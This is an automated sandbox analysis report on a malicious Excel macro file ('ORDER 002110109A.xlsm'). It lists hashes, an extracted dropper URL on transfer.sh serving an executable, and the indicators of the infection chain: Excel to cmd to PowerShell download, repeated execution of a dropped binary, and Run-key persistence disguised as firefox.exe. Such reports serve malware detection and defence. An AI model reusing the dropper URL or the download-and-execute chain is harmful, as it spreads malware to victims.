06e223bb2af0e00e3c5c7d2a0574e0cf69716f82432665221d49f62a8613b5ed

Analysis

max time kernel
123s
max time network
126s
platform
windows7_x64
resource
win7-en-20210920
submitted
10-10-2021 11:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ORDER 002110109A.xlsm
Size

388KB
MD5

fddb915231bd05bdb40250bd9ca9327a
SHA1

95e69dffccc8c93611de153fd9993faefc4b0f5f
SHA256

06e223bb2af0e00e3c5c7d2a0574e0cf69716f82432665221d49f62a8613b5ed
SHA512

da06766a2de1c0008ee9ed1d575bf8500a09ba511d056beb2c84e44ce7457d7e319c156695176de87247ca7faac68ea65af6216d47075f67341e6c2b61b13b43

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://transfer.sh/get/ii6Fqb/word.exe

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1236	1080	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 620 powershell.exe
Downloads MZ/PE file

flow	pid	process
5	620	powershell.exe

Executes dropped EXE 11 IoCs

Processes:

Kgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exeKgwugrfmaukbcbkgumu.exe

pid	process
1424	Kgwugrfmaukbcbkgumu.exe
1060	Kgwugrfmaukbcbkgumu.exe
1048	Kgwugrfmaukbcbkgumu.exe
1392	Kgwugrfmaukbcbkgumu.exe
1676	Kgwugrfmaukbcbkgumu.exe
1920	Kgwugrfmaukbcbkgumu.exe
1464	Kgwugrfmaukbcbkgumu.exe
1572	Kgwugrfmaukbcbkgumu.exe
1692	Kgwugrfmaukbcbkgumu.exe
676	Kgwugrfmaukbcbkgumu.exe
1016	Kgwugrfmaukbcbkgumu.exe

Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

1080 EXCEL.EXE

pid	process
1080	EXCEL.EXE

Loads dropped DLL 11 IoCs

Processes:

powershell.exeKgwugrfmaukbcbkgumu.exe

pid	process
620	powershell.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Kgwugrfmaukbcbkgumu.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\firefox = "\"C:\\Users\\Admin\\AppData\\Roaming\\firefox.exe\""	Kgwugrfmaukbcbkgumu.exe

Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE

NTFS ADS 1 IoCs

Processes:

EXCEL.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\4AD57F00\:Zone.Identifier:$DATA EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1080 EXCEL.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\4AD57F00\:Zone.Identifier:$DATA	EXCEL.EXE

pid	process
1080	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

powershell.exeKgwugrfmaukbcbkgumu.exe

pid	process
620	powershell.exe
620	powershell.exe
620	powershell.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe
1424	Kgwugrfmaukbcbkgumu.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

1080 EXCEL.EXE
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeKgwugrfmaukbcbkgumu.exe

description pid process

Token: SeDebugPrivilege 620 powershell.exe
Token: SeDebugPrivilege 1424 Kgwugrfmaukbcbkgumu.exe
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

EXCEL.EXE

pid process

1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE
1080 EXCEL.EXE

pid	process
1080	EXCEL.EXE

description	pid	process
Token: SeDebugPrivilege	620	powershell.exe
Token: SeDebugPrivilege	1424	Kgwugrfmaukbcbkgumu.exe

pid	process
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE
1080	EXCEL.EXE

Suspicious use of WriteProcessMemory 52 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeKgwugrfmaukbcbkgumu.exe

description	pid	process	target process
PID 1080 wrote to memory of 1236	1080	EXCEL.EXE	cmd.exe
PID 1080 wrote to memory of 1236	1080	EXCEL.EXE	cmd.exe
PID 1080 wrote to memory of 1236	1080	EXCEL.EXE	cmd.exe
PID 1080 wrote to memory of 1236	1080	EXCEL.EXE	cmd.exe
PID 1236 wrote to memory of 620	1236	cmd.exe	powershell.exe
PID 1236 wrote to memory of 620	1236	cmd.exe	powershell.exe
PID 1236 wrote to memory of 620	1236	cmd.exe	powershell.exe
PID 1236 wrote to memory of 620	1236	cmd.exe	powershell.exe
PID 620 wrote to memory of 1424	620	powershell.exe	Kgwugrfmaukbcbkgumu.exe
PID 620 wrote to memory of 1424	620	powershell.exe	Kgwugrfmaukbcbkgumu.exe
PID 620 wrote to memory of 1424	620	powershell.exe	Kgwugrfmaukbcbkgumu.exe
PID 620 wrote to memory of 1424	620	powershell.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1060	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1060	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1060	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1060	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1048	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1048	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1048	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1048	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1392	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1392	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1392	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1392	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1676	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1676	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1676	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1676	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1920	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1920	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1920	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1920	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1464	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1464	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1464	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1464	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1572	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1572	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1572	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1572	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1692	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1692	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1692	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1692	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 676	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 676	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 676	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 676	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1016	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1016	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1016	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe
PID 1424 wrote to memory of 1016	1424	Kgwugrfmaukbcbkgumu.exe	Kgwugrfmaukbcbkgumu.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ORDER 002110109A.xlsm"
1⤵
- Deletes itself
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
